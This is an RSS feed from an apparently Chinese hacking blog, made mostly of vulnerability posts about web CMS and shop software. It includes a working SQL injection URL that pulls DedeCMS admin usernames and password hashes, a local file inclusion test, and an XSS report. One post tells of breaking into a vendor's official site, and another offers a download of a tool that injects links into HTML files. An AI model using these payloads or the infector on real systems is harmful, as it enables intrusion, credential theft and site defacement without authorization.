<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
  <channel>
    <title><![CDATA[蜀山剑客's Blog   Http://Www.SSJK.Org]]></title> 
    <link>http://www.ssjk.org/</link> 
    <description><![CDATA[Shuttle back and forth between the network,Run quickly with great ease in the boundless net sea,Be seeking my goal and all, Make the  second living space of me,Continue  my second life .]]></description> 
    <language>en</language> 
    <copyright><![CDATA[Copyright 2010, 蜀山剑客's Blog   Http://Www.SSJK.Org]]></copyright> 
    <webMaster><![CDATA[ssjkcn@hotmai.com (ssjkcn)]]></webMaster> 
    <generator>LBS v2.0.313</generator> 
    <pubDate>Fri, 10 Sep 2010 12:18:49 +0800</pubDate> 
    <ttl>60</ttl>
  
    <item>
      <title><![CDATA[google]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=61]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 24 Mar 2010 22:22:10 +0800</pubDate> 
      <description><![CDATA[转载至  精灵 Blog   <a href="http://www.211314.com" title="http://www.211314.com" target="_blank">http://www.211314.com</a><br /><br />世界用Google，我们用百度；世界用youtube，我们用优酷；世界用牛奶，我们用三鹿；世界用游戏机，我们用劲舞；世界用facebook，我们用<br /><br />开心；世界用MSN，我们用QQ；世界用 WCDMA，我们用TD；世界用FTTH，我们用adsl；世界用internet，我们用LAN<br /><br />网易、腾讯、百度、谷歌等几个趴在一起吃屎。某天，一直捂着鼻子吃的谷歌终于爆发 ：臭死了，老子不吃了。网易的眉头皱了一下，腾讯好<br /><br />像听到了，好像没听到。百度听 到了 ，偷偷朝谷歌那边挪了一下，把谷歌那份屎扒到自己面前继续吃。”<br /><br />据悉，在Google准备退出中国之后，空气、水分、太阳、月亮也准备退出。中国强烈抗议自然界的2B行为，呼吁中华民族抵制自然界。<br /><br />什么？！Facebook没了？！。。。什么？！YouTube没了？！。。。什么？！Google没了？！。。。什么？！我也没了？！。。。<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=61]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[dedecms 5.1 gbk 版 0DAY]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=44]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 27 Nov 2008 21:02:11 +0800</pubDate> 
      <description><![CDATA[整了半天,终于找出了一个注射漏洞! <img src="http://www.ssjk.org/styles/default/images/smilies/icon_lol.gif" border="0" alt="[lol]" /> <br />暂不公布信息!<br />先公布修补漏洞方法:  关闭会员功能<br /><br />这漏洞现在公布了吧!刚朋友说  有个网站 上公布漏洞了,不过没有公布漏洞利用方法!<br /><br />漏洞描述:编码注射<br />漏洞文件:company/search.php<br />影响程序:高<br />漏洞成因:$comname过滤不完全<br />测试方法:(注:请勿作着非法用途,否则后果自负)<br />注册会员,注册时选择 公司,   公司名字只要包括  &quot;诚&quot;字即可, 如   诚有限公司 , <br />注册成功后访问<a href="http://url/company/search.php?comname=%d5&amp;#39;" title="http://url/company/search.php?comname=%d5&amp;#39;" target="_blank">http://url/company/search.php?comname=%d5&amp;#39;</a> and 1=2 union select 1,userid,3,4,5,pwd,7,8,9,10,11 from dede_admin%23/*]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=44]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[DedeCmsV5.1FreeSP1正式版 跨站漏洞]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=43]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 27 Nov 2008 16:39:48 +0800</pubDate> 
      <description><![CDATA[by 蜀山剑客  会员留言中多个变量未过滤就写入数据库,查看留言时触发跨站漏洞!<br />据我测试  dedecms 5.1 gbk版同样存在这个漏洞,估计UTF8也一样!<br /><br /><div style="width: 100%;overflow-x : auto;"><a href="http://www.ssjk.org/uploads/200811/27_164723_1.jpg.jpg" target="_blank"><img src="http://www.ssjk.org/uploads/200811/27_164723_1.jpg.jpg" alt="http://www.ssjk.org/uploads/200811/27_164723_1.jpg.jpg" /></a></div>]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=43]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[两PHP程序漏洞]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=42]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 25 Nov 2008 18:27:22 +0800</pubDate> 
      <description><![CDATA[一:  某影视系统所有页面均未对$id过滤,<br /><br /><div style="width: 100%;overflow-x : auto;"><a href="http://www.ssjk.org/uploads/200811/25_183055_11.jpg" target="_blank"><img src="http://www.ssjk.org/uploads/200811/25_183055_11.jpg" alt="http://www.ssjk.org/uploads/200811/25_183055_11.jpg" /></a></div><br /><br />二: 某CMS系统<br /><br />漏洞描述：本地包含<br />漏洞文件:adminm/adminm.php<br />影响程度：中<br />漏洞成因：未过滤$action<br />漏洞代码:include_once M_ROOT.&#39;./adminm/&#39;.$action.&#39;.inc.php&#39;;<br />测试方法：注册会员，提交adminm/adminm.php?action=xxxxx<br />鸡肋漏洞.呵呵]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=42]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[写了个感染网页的小东西---五.一快乐]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=30]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 01 May 2008 06:11:18 +0800</pubDate> 
      <description><![CDATA[VC写的,体积16K,是控制台运行的,写成WIN32加壳会更小!<br />怕被乱用,只感染HTML文件.其它网页文件不感染!<br /><br />Explain: filename.exe d: www.xx.com/mm.htm<br />         filename.exe d:\\wwwroot www.xx.com/mm.htm<br /><a href="http://www.ssjk.org/uploads/200805/01_061327_html.rar" title="http://www.ssjk.org/uploads/200805/01_061327_html.rar" target="_blank"><img src="http://www.ssjk.org/styles/default/images/icon_file.gif" border="0" /> Click Here To Download</a>]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=30]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[最近看一个商城购物的程序,做的还不错!不过安全确实很有问题!]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=23]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Mon, 07 Jan 2008 18:08:28 +0800</pubDate> 
      <description><![CDATA[如题,本来这样的漏洞一抓一大把-------注入,也不想写的,哈哈!看了下还有商业版,由是乎就到官方演示站去看看.结果也存在这种漏洞,更笑人的是联系了官方的销售人员,他说技术员很忙.只要商业用户没漏洞就行了.我告诉那妹妹你们官方都有这漏洞,她还不相信!于是我就干了他们官方网站,然后就写了此文!<br /><br />漏洞描述:<br />开发语言:asp.net<br /><br />程序名字:易想商城3.0（这是最新的，其它版本就不用看了）<br /><br />漏洞产生:<br />在Productlist_1.aspx这个。确切说是在Productlist_1.aspx.cs <br /> 第44行开始！ <br />if (HttpContext.Current.Request[&quot;SearchText&quot;] != null)<br />        {<br />            SearchText = HttpContext.Current.Request[&quot;SearchText&quot;].ToString();<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=23]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[ART OF WEB-SQL-INJECTION第2卷 ORACLE篇]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=7]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 29 Aug 2007 11:34:38 +0800</pubDate> 
      <description><![CDATA[文章作者：kj021320<br />信息来源：邪恶八进制信息安全团队（www.eviloctal.com）<br /><br />注意：本文章首发I.S.T.O技术团队，后由原创作者友情提交到邪恶八进制信息安全团队论坛。<br />author : kj021320<br />team: I.S.T.O<br />很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关！然而那些脚本只是一种辅助<br />例如ASP/ASPX JSP 啥限制都没！而PHP则会把&#39; 过滤为\&#39; 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了！<br />但是我觉得这些脚本语言都不狠~如果CFM的话 估计你就没折了！ 具体各数据库相关信息请参看<br />ART OF WEB-SQL-INJECTION第1卷 感谢AMXSA以及I.C.E多我的支持<br /><br />OK言归正传,在国外对ORACLE的攻击一直很收关注,只是国内研究的人不太多,或者技术不够~这里我就打响第一炮吧！<br />SQLINJECTION ]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=7]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[入侵oracle数据库的一些心得]]></title> 
      <link><![CDATA[http://www.ssjk.org/article.asp?id=6]]></link> 
      <category><![CDATA[hacker]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 29 Aug 2007 11:27:45 +0800</pubDate> 
      <description><![CDATA[软件作者：pt007[at]vip.sina.com版权所有,转载请注明版权<br />信息来源：邪恶八进制信息安全团队（www.eviloctal.com）<br />一、先看下面的一个贴子:<br /><br />    Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点： <br /><br />1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系统维护具有高的性能，Oracle每天可连续24小时工作，正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。<br /><br />2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统，保护了用]]></description>
      <wfw:commentRss><![CDATA[http://www.ssjk.org/feed.asp?q=comment&id=6]]></wfw:commentRss>
    </item>
      
  </channel>
</rss>
